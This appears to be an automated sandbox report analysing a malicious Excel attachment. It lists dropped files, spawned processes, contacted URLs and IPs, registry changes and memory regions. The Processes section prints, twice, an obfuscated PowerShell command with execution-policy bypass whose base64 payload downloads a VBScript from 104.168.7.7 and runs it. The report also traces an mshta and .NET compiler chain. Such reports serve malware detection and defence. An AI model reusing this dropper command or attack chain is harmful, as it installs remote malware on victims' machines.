Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
PI#0034250924.xla.xlsx
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 02:09:56 2024, Security: 1
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\temp_exec.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Enetbookupdation.vbs
|
ASCII text, with very long lines (65478), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\~$PI#0034250924.xla.xlsx
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IEnetbookupdation[1].vbs
|
ASCII text, with very long lines (65478), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESB8B5.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:26:28 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\fji3hte3.a5m.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\s4hj22iq.ipe.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF096F86C2DF7A876A.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFF1E1590C893D8C32.TMP
|
data
|
dropped
|
||
C:\Users\user\Desktop\F7A30000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1
|
dropped
|
||
C:\Users\user\Desktop\F7A30000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PI#0034250924.xla.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs
-NoP -W 1 -C
DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOWeRSHelL.eXE -ex ByPASs
-NoP -W 1 -C
DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
|
||
C:\Users\user\AppData\Local\Temp\temp_exec.exe
|
"C:\Users\user\AppData\Local\Temp\temp_exec.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp"
"c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://104.168.7.7/356/ce/IEnetbookupdateion.hta
|
104.168.7.7
|
||
http://104.168.7.7/356/IEnetbookupdation.vbs
|
104.168.7.7
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://og1.in/Ts9zjeS
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
https://og1.in/
|
unknown
|
||
http://104.168.7.7/356/ce/IEnetbookupdateion.hta...Sm
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://104.168.7.7/356/ce/IEnetbookupdateion.htac
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://og1.in/Ts9zjet5
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
http://104.168.7.7/356/ce/IEnetbookupdateion.htase
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://og1.in/Ts9zje
|
172.67.216.244
|
||
https://og1.in/Ts9zje.htalicy
|
unknown
|
||
https://og1.in/Ts9zjeI5
|
unknown
|
||
http://104.168.7.7/356/ce/IEnetbookupdateion.htaxo
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://104.168.7.7/356/IEnetbookupdation.vbsp
|
unknown
|
||
http://104.168.7.7/356/IEnetbookupdation.vbsiptor
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://104.168.7.7/356/ce/IEnetbookupdateion.htahttp://104.168.7.7/356/ce/IEnetbookupdateion.htaP
|
unknown
|
||
https://og1.in/Ts9zje#
|
unknown
|
||
http://104.168.7.7/356/IEnetbook
|
unknown
|
||
https://og1.in/X
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://104.168.7.7/
|
unknown
|
||
http://104.168.7.7/356/ce/IEnetbookupdateion.htattingsk
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
http://go.cr
|
unknown
|
||
http://104.168.7.7/356/ce/IEnetbookupdateion.htawwC:
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
og1.in
|
172.67.216.244
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.168.7.7
|
unknown
|
United States
|
||
104.21.78.54
|
unknown
|
United States
|
||
172.67.216.244
|
og1.in
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
8&/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
%3/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3A9B7
|
3A9B7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 35 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
400000
|
remote allocation
|
page execute and read and write
|
||
230000
|
direct allocation
|
page read and write
|
||
1F40000
|
direct allocation
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
4D4C000
|
heap
|
page read and write
|
||
4A01000
|
heap
|
page read and write
|
||
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
4D6D000
|
heap
|
page read and write
|
||
50EF000
|
heap
|
page read and write
|
||
4DBF000
|
heap
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
50F3000
|
heap
|
page read and write
|
||
4660000
|
trusted library allocation
|
page read and write
|
||
1FF4000
|
heap
|
page read and write
|
||
4E9E000
|
heap
|
page read and write
|
||
1FA7000
|
direct allocation
|
page read and write
|
||
4E22000
|
heap
|
page read and write
|
||
2F72000
|
trusted library allocation
|
page read and write
|
||
4DE1000
|
heap
|
page read and write
|
||
4D60000
|
heap
|
page read and write
|
||
1D98000
|
stack
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
4B78000
|
heap
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
4F99000
|
heap
|
page read and write
|
||
4EEF000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
4DC4000
|
heap
|
page read and write
|
||
4B71000
|
heap
|
page read and write
|
||
5003000
|
heap
|
page read and write
|
||
5062000
|
heap
|
page read and write
|
||
4FA2000
|
heap
|
page read and write
|
||
4F99000
|
heap
|
page read and write
|
||
4E51000
|
heap
|
page read and write
|
||
4F9C000
|
heap
|
page read and write
|
||
502D000
|
heap
|
page read and write
|
||
4E45000
|
heap
|
page read and write
|
||
4D46000
|
heap
|
page read and write
|
||
4E43000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
4DAB000
|
heap
|
page read and write
|
||
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
509B000
|
heap
|
page read and write
|
||
4DD1000
|
heap
|
page read and write
|
||
B84000
|
heap
|
page read and write
|
||
356000
|
heap
|
page read and write
|
||
1D0000
|
trusted library allocation
|
page read and write
|
||
4E1D000
|
heap
|
page read and write
|
||
50A8000
|
heap
|
page read and write
|
||
4EC4000
|
heap
|
page read and write
|
||
505F000
|
heap
|
page read and write
|
||
505A000
|
heap
|
page read and write
|
||
49B4000
|
heap
|
page read and write
|
||
479000
|
heap
|
page read and write
|
||
4D6D000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
4F3000
|
heap
|
page read and write
|
||
4EEA000
|
heap
|
page read and write
|
||
4DAA000
|
heap
|
page read and write
|
||
500C000
|
heap
|
page read and write
|
||
1AE16000
|
heap
|
page read and write
|
||
50E3000
|
heap
|
page read and write
|
||
37C000
|
heap
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
4F8C000
|
heap
|
page read and write
|
||
47A000
|
heap
|
page read and write
|
||
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
5080000
|
heap
|
page read and write
|
||
4F11000
|
heap
|
page read and write
|
||
5007000
|
heap
|
page read and write
|
||
4FC7000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
4E67000
|
heap
|
page read and write
|
||
50CC000
|
heap
|
page read and write
|
||
5085000
|
heap
|
page read and write
|
||
7FE8B6DE000
|
trusted library allocation
|
page read and write
|
||
351000
|
heap
|
page read and write
|
||
3784000
|
heap
|
page read and write
|
||
4F29000
|
heap
|
page read and write
|
||
1C2A3000
|
heap
|
page read and write
|
||
3A6000
|
heap
|
page read and write
|
||
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
5073000
|
heap
|
page read and write
|
||
B40000
|
direct allocation
|
page execute and read and write
|
||
4B43000
|
heap
|
page read and write
|
||
4FD5000
|
heap
|
page read and write
|
||
4B74000
|
heap
|
page read and write
|
||
50CE000
|
heap
|
page read and write
|
||
4E63000
|
heap
|
page read and write
|
||
50F2000
|
heap
|
page read and write
|
||
321000
|
heap
|
page read and write
|
||
50EA000
|
heap
|
page read and write
|
||
4E22000
|
heap
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
4B76000
|
heap
|
page read and write
|
||
50B1000
|
heap
|
page read and write
|
||
360000
|
trusted library allocation
|
page read and write
|
||
381000
|
heap
|
page read and write
|
||
4F11000
|
heap
|
page read and write
|
||
4DB9000
|
heap
|
page read and write
|
||
4D76000
|
heap
|
page read and write
|
||
B47000
|
direct allocation
|
page execute and read and write
|
||
5006000
|
heap
|
page read and write
|
||
5019000
|
heap
|
page read and write
|
||
36B000
|
heap
|
page read and write
|
||
4E4A000
|
heap
|
page read and write
|
||
4E4F000
|
heap
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
1B400000
|
trusted library section
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
4F1B000
|
heap
|
page read and write
|
||
4B75000
|
heap
|
page read and write
|
||
2170000
|
heap
|
page execute and read and write
|
||
4F80000
|
heap
|
page read and write
|
||
4A79000
|
heap
|
page read and write
|
||
44A000
|
heap
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
50AA000
|
heap
|
page read and write
|
||
5078000
|
heap
|
page read and write
|
||
3B5D000
|
trusted library allocation
|
page read and write
|
||
505A000
|
heap
|
page read and write
|
||
4CD000
|
heap
|
page read and write
|
||
4E9B000
|
heap
|
page read and write
|
||
4D7C000
|
heap
|
page read and write
|
||
4B7A000
|
heap
|
page read and write
|
||
4E70000
|
heap
|
page read and write
|
||
35B000
|
heap
|
page read and write
|
||
4F0B000
|
heap
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
4E74000
|
heap
|
page read and write
|
||
7FE8B550000
|
trusted library allocation
|
page read and write
|
||
4ED0000
|
heap
|
page read and write
|
||
4FFC000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
3BB000
|
direct allocation
|
page read and write
|
||
40FE000
|
stack
|
page read and write
|
||
390000
|
heap
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
3799000
|
heap
|
page read and write
|
||
776000
|
heap
|
page read and write
|
||
7FE89C16000
|
trusted library allocation
|
page read and write
|
||
4DCC000
|
heap
|
page read and write
|
||
4E8B000
|
heap
|
page read and write
|
||
352000
|
heap
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
1C31C000
|
heap
|
page read and write
|
||
50B5000
|
heap
|
page read and write
|
||
7FE8B6E0000
|
trusted library allocation
|
page execute and read and write
|
||
4EF4000
|
heap
|
page read and write
|
||
4D46000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
43B000
|
heap
|
page read and write
|
||
43A000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
1A720000
|
heap
|
page read and write
|
||
4F7E000
|
heap
|
page read and write
|
||
4F1B000
|
heap
|
page read and write
|
||
265000
|
heap
|
page read and write
|
||
4D7E000
|
heap
|
page read and write
|
||
5023000
|
heap
|
page read and write
|
||
4DEB000
|
heap
|
page read and write
|
||
4E37000
|
heap
|
page read and write
|
||
4E6F000
|
heap
|
page read and write
|
||
50F4000
|
heap
|
page read and write
|
||
4E94000
|
heap
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
CC4000
|
direct allocation
|
page execute and read and write
|
||
502A000
|
heap
|
page read and write
|
||
124C1000
|
trusted library allocation
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
4E64000
|
heap
|
page read and write
|
||
4EC6000
|
heap
|
page read and write
|
||
5176000
|
heap
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
5055000
|
heap
|
page read and write
|
||
1D50000
|
direct allocation
|
page read and write
|
||
5084000
|
heap
|
page read and write
|
||
1A71C000
|
stack
|
page read and write
|
||
1C7C0000
|
heap
|
page read and write
|
||
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
3AD000
|
heap
|
page read and write
|
||
1C150000
|
heap
|
page read and write
|
||
26B4000
|
trusted library allocation
|
page read and write
|
||
501A000
|
heap
|
page read and write
|
||
5179000
|
heap
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
5041000
|
heap
|
page read and write
|
||
5194000
|
heap
|
page read and write
|
||
51A8000
|
heap
|
page read and write
|
||
3E8F000
|
trusted library allocation
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
4FE6000
|
heap
|
page read and write
|
||
1B1BF000
|
stack
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
4EF4000
|
heap
|
page read and write
|
||
4EF9000
|
heap
|
page read and write
|
||
3AC000
|
heap
|
page read and write
|
||
43B000
|
heap
|
page read and write
|
||
4F02000
|
heap
|
page read and write
|
||
4FAE000
|
heap
|
page read and write
|
||
4FC6000
|
heap
|
page read and write
|
||
505A000
|
heap
|
page read and write
|
||
4DDF000
|
heap
|
page read and write
|
||
4FDB000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
504D000
|
heap
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
1BD40000
|
heap
|
page read and write
|
||
50E1000
|
heap
|
page read and write
|
||
4E8C000
|
heap
|
page read and write
|
||
4F0C000
|
heap
|
page read and write
|
||
421000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
503D000
|
heap
|
page read and write
|
||
1C2C7000
|
heap
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
4D9F000
|
heap
|
page read and write
|
||
505F000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
4FAE000
|
heap
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
46B000
|
heap
|
page read and write
|
||
399000
|
heap
|
page read and write
|
||
3DF0000
|
trusted library allocation
|
page read and write
|
||
379D000
|
heap
|
page read and write
|
||
4DD0000
|
heap
|
page read and write
|
||
4FAE000
|
heap
|
page read and write
|
||
4EDF000
|
heap
|
page read and write
|
||
4CB000
|
heap
|
page read and write
|
||
1C3A1000
|
heap
|
page read and write
|
||
4F3A000
|
heap
|
page read and write
|
||
50CE000
|
heap
|
page read and write
|
||
339000
|
heap
|
page read and write
|
||
4E8C000
|
heap
|
page read and write
|
||
4D8B000
|
heap
|
page read and write
|
||
4E1E000
|
heap
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
4E5A000
|
heap
|
page read and write
|
||
3A5000
|
heap
|
page read and write
|
||
5017000
|
heap
|
page read and write
|
||
4DD3000
|
heap
|
page read and write
|
||
4D73000
|
heap
|
page read and write
|
||
4F65000
|
heap
|
page read and write
|
||
355000
|
heap
|
page read and write
|
||
5112000
|
heap
|
page read and write
|
||
4B4F000
|
heap
|
page read and write
|
||
50F9000
|
heap
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
